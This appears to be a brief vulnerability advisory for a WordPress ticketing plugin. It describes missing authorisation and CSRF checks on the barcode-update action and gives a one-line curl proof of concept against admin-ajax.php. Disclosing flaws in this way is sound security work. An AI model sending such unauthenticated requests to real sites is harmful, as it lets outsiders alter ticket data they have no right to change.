The plugin does not have authorisation and CSRF when updating a ticket bar-code, allowing unauthenticated users to perform such action
curl https://example.com/wp-admin/admin-ajax.php -d "action=save_ticket_barcode&ticket_barcode_image=xxx&ticket_barcode_text=xxxxx&ticket_id=86"